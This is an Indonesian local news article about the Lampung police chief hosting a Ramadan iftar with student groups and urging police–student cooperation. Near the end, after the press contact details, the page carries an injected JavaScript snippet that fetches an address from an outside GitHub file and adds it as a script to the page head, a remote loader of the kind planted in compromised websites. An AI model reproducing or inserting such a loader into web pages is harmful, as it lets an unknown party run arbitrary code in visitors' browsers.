Kapolda Lampung Buka Puasa Bersama Kelompok Organisasi Mahasiswa: Mari Terus Pupuk Sinergitas

Mesuji Tempo // Lampung

Kapolda Lampung, Irjen Pol Helmy Santika dan Wakapolda Lampung, Brigjen Pol Ahmad Ramadhan menggelar buka puasa Ramadan bersama kelompok BEM, OKP Cipayung Plus, dan Mahasiswa Papua Lampung, Kamis (4/4/2024).

Kabid Humas Polda Lampung, Kombes Pol Umi Fadilah Astutik mengatakan, pertemuan itu sebagai ajang silaturahmi sekaligus buka puasa bersama dengan berbagai kelompok organisasi mahasiswa di Provinsi Lampung.

“Semoga pertemuan tersebut dapat mempererat tali persaudaraan dan sinergisitas antara Polda Lampung dengan rekan-rekan mahasiswa,” ujarnya dikonfirmasi, Jumat (5/4/2024).

Kata Umi, dalam kegiatan ini Kapolda Lampung turut memberikan sambutan dihadapan kelompok mahasiswa mengikuti kegiatan tersebut.

Menurutnya, membangun hubungan tidak hanya bertemu saat di jalan, namun bisa melalui beberapa aktifitas seperti kegiatan olah raga futsal, bakti sosial dan seminar atau diskusi-diskusi publik terus dilakukan hubungan baik antara kedua pihak bisa tetap terjaga.

“Polda Lampung juga telah memfasilitasi Rumah Kebangsaan, agar dimaksimalkan dapat dijadikan sebagai tempat diskusi antar rekan mahasiswa,” ucapnya.

Lebih lanjut Umi turut mengatakan, kepolisian daerah di Lampung dan jajarannya juga mengharapkan masukan-masukan membangun dari rekan-rekan mahasiswa, khususnya terkait pada dibidang keamanan.

“Melalui momen Idul Fitri di tahun ini, mari kita terus pupuk sinergisitas dan kebersamaan kita dalam mewujudkan Provinsi Lampung yang aman dan kondusif,” tandas Kabid Humas. (Team)

KABID HUMAS POLDA LAMPUNG

Kombes Pol Umi Fadilah Astutik.,S.Sos.,S.Ik.,M.Si

Email : humaspoldalampung@gmail.com

Twitter : humas_poldalpg

FB : humas_@poldalampung

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *